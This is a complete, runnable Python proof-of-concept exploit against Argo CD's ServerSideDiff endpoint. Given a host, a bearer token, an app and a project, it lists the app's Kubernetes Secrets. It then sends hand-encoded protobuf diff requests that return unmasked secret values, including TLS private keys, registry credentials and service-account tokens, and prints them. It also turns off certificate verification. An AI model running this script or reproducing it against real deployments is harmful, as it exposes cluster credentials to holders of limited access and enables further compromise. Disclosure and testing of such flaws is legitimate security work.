#!/usr/bin/env python3
"""
Argo CD ServerSideDiff Secret Extraction PoC
Usage:
python3 poc.py <host> <token> <app> <project>
Example:
python3 poc.py argocd.int.<customer>.com eyJhbG... my-app my-project
"""
import base64
import http.client
import json
import ssl
import struct
import sys
import urllib.parse
from collections import defaultdict
def encode_varint(v):
    """Encode an integer as a protobuf base-128 varint.

    Args:
        v: Integer to encode. Negative values are encoded in their 64-bit
            two's-complement form (ten bytes), which is how protobuf
            serialises negative int32/int64 values.

    Returns:
        The varint as ``bytes``, least-significant 7-bit group first.

    Raises:
        ValueError: If ``v`` is below -2**63 and therefore has no 64-bit
            two's-complement representation.
    """
    if v < 0:
        if v < -(1 << 63):
            raise ValueError("varint out of range: %d" % v)
        # Without this mask the loop below is skipped for negatives and a
        # single meaningless byte (v & 0x7f) would be emitted.
        v &= (1 << 64) - 1
    out = bytearray()
    while v > 0x7F:
        out.append((v & 0x7F) | 0x80)  # low 7 bits + continuation bit
        v >>= 7
    out.append(v & 0x7F)
    return bytes(out)
def encode_str(field, val):
    """Serialise a text value as a length-delimited protobuf field.

    Args:
        field: Protobuf field number.
        val: ``str`` to encode; it is converted with ``str.encode()``
            (UTF-8 by default).

    Returns:
        ``bytes`` consisting of the field key (wire type 2), the payload
        length as a varint, and the encoded payload.
    """
    key = (field << 3) | 2  # wire type 2 = length-delimited
    payload = val.encode()
    return b"".join((encode_varint(key), encode_varint(len(payload)), payload))
def encode_bytes(field, val):
    """Serialise a raw byte string as a length-delimited protobuf field.

    Args:
        field: Protobuf field number.
        val: Payload bytes, emitted unchanged after the header.

    Returns:
        The field key (wire type 2) and the payload length, both as
        varints, followed by ``val``.
    """
    key = (field << 3) | 2  # wire type 2 = length-delimited
    header = encode_varint(key) + encode_varint(len(val))
    return header + val
def encode_bool(field, val):
    """Serialise a boolean as a varint (wire type 0) protobuf field.

    Args:
        field: Protobuf field number.
        val: Any value; its truthiness decides whether 1 or 0 is written.

    Returns:
        The field key followed by a one-byte varint (``0x01`` or ``0x00``).
    """
    key = (field << 3) | 0  # wire type 0 = varint
    if val:
        flag = 1
    else:
        flag = 0
    return encode_varint(key) + encode_varint(flag)
def decode_varint(data, pos):
    """Read one base-128 varint from ``data`` starting at index ``pos``.

    The decoder is deliberately lenient: if ``data`` ends before a byte
    without the continuation bit is seen, the bits gathered so far are
    returned instead of raising.

    Args:
        data: Indexable sequence of byte values (e.g. ``bytes``).
        pos: Index of the first byte of the varint.

    Returns:
        ``(value, next_pos)`` where ``next_pos`` is the index just past the
        last byte consumed. When ``pos`` is already at or beyond the end of
        ``data`` the result is ``(0, pos)``.
    """
    value = 0
    for group, idx in enumerate(range(pos, len(data))):
        byte = data[idx]
        value |= (byte & 0x7F) << (7 * group)
        if not (byte & 0x80):
            # Continuation bit clear: this was the final byte.
            return value, idx + 1
    # Ran off the end (or never started): report how far we got.
    return value, max(pos, len(data))
def decode_fields(data):
    """Split a serialised protobuf message into its top-level fields.

    Parsing is best-effort: it stops silently at the first key whose wire
    type is not 0, 1, 2 or 5, and slices that run past the end of ``data``
    are simply shorter than declared.

    Args:
        data: Serialised message bytes.

    Returns:
        A plain ``dict`` mapping field number to the list of values seen
        for that field, in order of appearance. Varint fields (wire type 0)
        yield ``int``; length-delimited (2), 32-bit (5) and 64-bit (1)
        fields yield the raw byte slice.
    """
    fixed_widths = {5: 4, 1: 8}  # wire type -> payload size in bytes
    parsed = defaultdict(list)
    cursor = 0
    total = len(data)
    while cursor < total:
        key, cursor = decode_varint(data, cursor)
        number = key >> 3
        wire_type = key & 0x07
        if wire_type == 0:
            value, cursor = decode_varint(data, cursor)
        elif wire_type == 2:
            size, cursor = decode_varint(data, cursor)
            value = data[cursor:cursor + size]
            cursor += size
        elif wire_type in fixed_widths:
            width = fixed_widths[wire_type]
            value = data[cursor:cursor + width]
            cursor += width
        else:
            # Unsupported wire type: give up on the rest of the message.
            break
        parsed[number].append(value)
    return dict(parsed)
# -- grpc-web framing --
def grpc_frame(payload):
    """Wrap ``payload`` in a single grpc-web frame.

    Args:
        payload: Message bytes to frame.

    Returns:
        A 5-byte header (flag byte ``0x00`` followed by the payload length
        as a big-endian unsigned 32-bit integer) and then ``payload``.
    """
    header = struct.pack(">BI", 0, len(payload))
    return header + payload
def decode_grpc_frames(data):
    """Split a grpc-web body into its ``(flag, payload)`` frames.

    Each frame is a 1-byte flag, a big-endian unsigned 32-bit length and
    that many payload bytes. Trailing bytes too short to hold a header are
    ignored, and a payload cut off by the end of ``data`` is returned
    truncated rather than rejected.

    Args:
        data: Raw response body.

    Returns:
        List of ``(flag, payload)`` tuples in the order they appear.
    """
    header = struct.Struct(">BI")
    frames = []
    offset = 0
    while len(data) - offset >= header.size:
        flag, size = header.unpack_from(data, offset)
        body_start = offset + header.size
        offset = body_start + size
        frames.append((flag, data[body_start:offset]))
    return frames
# -- http helpers --
def make_conn(host):
    """Create an (unconnected) HTTPS connection object for ``host``.

    WARNING: certificate and hostname verification are disabled, so the
    peer is not authenticated and anything sent over this connection
    (including bearer tokens) is exposed to an on-path attacker. Only use
    against hosts you are authorised to test.

    Args:
        host: ``"hostname"``, ``"hostname:port"`` or a bracketed IPv6
            literal. The port defaults to 443 when not given.

    Returns:
        An ``http.client.HTTPSConnection`` with a 10-second timeout.
    """
    ctx = ssl.create_default_context()
    # check_hostname has to be switched off first; the ssl module refuses
    # CERT_NONE while hostname checking is still enabled.
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    # Do not pass an explicit port: http.client only parses "host:port"
    # (and strips IPv6 brackets) when the port argument is left unset.
    return http.client.HTTPSConnection(host, context=ctx, timeout=10)
def rest_get(conn, path, token):
    """Issue an authenticated GET and decode the JSON response.

    Args:
        conn: Object with ``request``/``getresponse`` methods, e.g. an
            ``http.client.HTTPSConnection``.
        path: Request path (already URL-encoded).
        token: Bearer token placed in the ``Authorization`` header.

    Returns:
        ``(data, None)`` on success, where ``data`` is the decoded JSON
        body, or ``(None, message)`` when the status is not 200 or the body
        is not valid JSON. Connection-level exceptions raised by ``conn``
        are not caught here.
    """
    conn.request("GET", path, headers={
        "Authorization": "Bearer " + token,
        "Accept": "application/json",
    })
    resp = conn.getresponse()
    body = resp.read()
    if resp.status != 200:
        return None, "HTTP %d" % resp.status
    try:
        return json.loads(body), None
    except ValueError as exc:
        # A 200 with a non-JSON body (e.g. an HTML login page from a proxy)
        # is reported through the error slot like every other failure,
        # instead of escaping as a traceback.
        return None, "invalid JSON in response: %s" % exc
def grpc_post(conn, token, payload):
    """POST one grpc-web framed message to the ServerSideDiff endpoint.

    Args:
        conn: Object with ``request``/``getresponse`` methods, e.g. an
            ``http.client.HTTPSConnection``.
        token: Bearer token placed in the ``Authorization`` header.
        payload: Serialised request message; it is framed with
            ``grpc_frame`` before sending.

    Returns:
        ``(data, None)`` with the payload of the first frame whose flag
        byte is 0, or ``(None, message)`` when the HTTP status is not 200
        or the response contains no such frame.
    """
    body = grpc_frame(payload)
    headers = {
        "Content-Type": "application/grpc-web+proto",
        "Accept": "application/grpc-web+proto",
        "X-Grpc-Web": "1",
        "Authorization": "Bearer " + token,
    }
    conn.request(
        "POST",
        "/application.ApplicationService/ServerSideDiff",
        body=body,
        headers=headers,
    )
    response = conn.getresponse()
    raw = response.read()
    if response.status != 200:
        return None, "HTTP %d" % response.status
    # Frames with a non-zero flag are skipped; only flag 0 counts as data.
    first_data = next(
        (chunk for flag, chunk in decode_grpc_frames(raw) if flag == 0),
        None,
    )
    if first_data is None:
        return None, "no data frame in response"
    return first_data, None
# -- main --
def main() -> None:
    """Command-line entry point.

    Expects exactly four positional arguments: host, bearer token,
    application name and project. It then:

    1. GETs the application's managed resources and keeps every item whose
       ``kind`` is ``"Secret"``, reading the secret type from the item's
       ``liveState`` JSON (defaulting to ``"Opaque"``).
    2. For each secret, builds a target manifest, hand-encodes a request
       message and posts it via ``grpc_post``; any JSON object of kind
       ``Secret`` found in field 5 of the field-1 items of the response is
       inspected, and ``data`` values that are not made up solely of ``+``
       characters are printed (truncated to 120 characters).

    Exits with status 1 on bad usage or if the resource listing fails, and
    with status 0 if no secrets are listed. Per-secret failures are printed
    and skipped.

    NOTE(review): the protobuf field numbers used below follow the inline
    comments; the message schema is not visible in this file — confirm
    against the server's proto definitions.
    NOTE(review): none of the connections created here are explicitly
    closed.
    """
    if len(sys.argv) != 5:
        print("Usage: python3 poc.py <host> <token> <app> <project>")
        sys.exit(1)
    host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
    # This connection is only used for the REST call in step 1; step 2
    # rebinds `conn` to a fresh connection for every request.
    conn = make_conn(host)
    # step 1: list managed resources for the app, find secrets
    print("[*] Fetching managed resources for %s/%s ..." % (project, app_name))
    data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token)
    if err:
        print("[-] Failed: %s" % err); sys.exit(1)
    # Each entry is (name, namespace, secret type, raw liveState string).
    secrets = []
    for r in data.get("items", []):
        if r.get("kind") != "Secret":
            continue
        name = r.get("name", "")
        ns = r.get("namespace", "")
        live = r.get("liveState", "")
        stype = "Opaque"
        # liveState is a JSON document carried as a string; the literal
        # string "null" is treated the same as an absent value.
        if live and live != "null":
            try:
                stype = json.loads(live).get("type", "Opaque")
            except Exception:
                # Unparseable liveState: keep the "Opaque" default.
                pass
        secrets.append((name, ns, stype, live))
    if not secrets:
        print("[-] No secrets found in managed resources"); sys.exit(0)
    print("[+] Found %d secrets" % len(secrets))
    # step 2: call ServerSideDiff for each secret
    total_extracted = 0
    for sname, sns, stype, live_json in secrets:
        # build minimal target manifest (no data field)
        target = {"apiVersion": "v1", "kind": "Secret",
                  "metadata": {"name": sname, "namespace": sns},
                  "type": stype}
        # copy required annotations from live state for SA tokens
        if live_json and live_json != "null":
            try:
                live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {})
                # Only annotations under the kubernetes.io/ prefix are carried over.
                k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")}
                if k8s_annots:
                    target["metadata"]["annotations"] = k8s_annots
            except Exception:
                # Best effort: proceed without annotations.
                pass
        # for TLS secrets, include required placeholder keys
        if stype == "kubernetes.io/tls":
            target["data"] = {
                "tls.crt": base64.b64encode(b"PLACEHOLDER").decode(),
                "tls.key": base64.b64encode(b"PLACEHOLDER").decode(),
            }
        elif stype == "kubernetes.io/dockerconfigjson":
            target["data"] = {".dockerconfigjson": base64.b64encode(b'{"auths":{}}').decode()}
        # encode the grpc request
        # `lr` is the nested message embedded as field 4 of the query below.
        lr = b""
        lr += encode_str(2, "Secret") # kind
        lr += encode_str(3, sns) # namespace
        lr += encode_str(4, sname) # name
        # Unlike the checks above, a literal "null" liveState is still sent.
        if live_json:
            lr += encode_str(6, live_json) # liveState
        lr += encode_bool(12, True) # modified
        query = encode_str(1, app_name)
        query += encode_str(3, project)
        query += encode_bytes(4, lr)
        query += encode_str(5, json.dumps(target))
        # reconnect for each call (simple, no pool needed for poc)
        try:
            conn = make_conn(host)
            resp_data, err = grpc_post(conn, token, query)
        except Exception as e:
            # Connection-level failure: report and move on to the next secret.
            print(" [!] %s/%s: %s" % (sns, sname, e))
            continue
        if err:
            print(" [!] %s/%s: %s" % (sns, sname, err))
            continue
        # parse response
        resp_fields = decode_fields(resp_data)
        # Field 1 holds the repeated result items (nested messages).
        for item_bytes in resp_fields.get(1, []):
            # decode_fields yields ints for varint fields; only byte
            # payloads can be nested messages.
            if not isinstance(item_bytes, bytes):
                continue
            ifields = decode_fields(item_bytes)
            # field 5 = targetState (predictedLive — has real values from etcd)
            for raw in ifields.get(5, []):
                if not isinstance(raw, bytes):
                    continue
                try:
                    obj = json.loads(raw)
                except Exception:
                    continue
                if obj.get("kind") != "Secret":
                    continue
                secret_data = obj.get("data", {})
                if not secret_data:
                    continue
                # check for real (non-masked) values
                real_keys = {}
                for k, v in secret_data.items():
                    if not v:
                        continue
                    if all(c == "+" for c in v):
                        continue # masked by argocd
                    try:
                        decoded = base64.b64decode(v)
                        # errors="replace" keeps binary values printable.
                        text = decoded.decode("utf-8", errors="replace")
                    except Exception:
                        continue
                    if all(c == "+" for c in text) and text:
                        continue # masked (base64 of +++...)
                    real_keys[k] = text
                if real_keys:
                    # Counted once per matching object, not once per key.
                    total_extracted += 1
                    print("\n [***] %s/%s (%s)" % (sns, sname, stype))
                    print(" %d/%d keys extracted:" % (len(real_keys), len(secret_data)))
                    for k in sorted(real_keys):
                        # Keep each value on one line and cap its length.
                        v = real_keys[k].replace("\n", "\\n")
                        if len(v) > 120:
                            v = v[:120] + "..."
                        print(" %s: %s" % (k, v))
    print("\n[*] Done. %d secrets with real values extracted." % total_extracted)
# Run main() only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()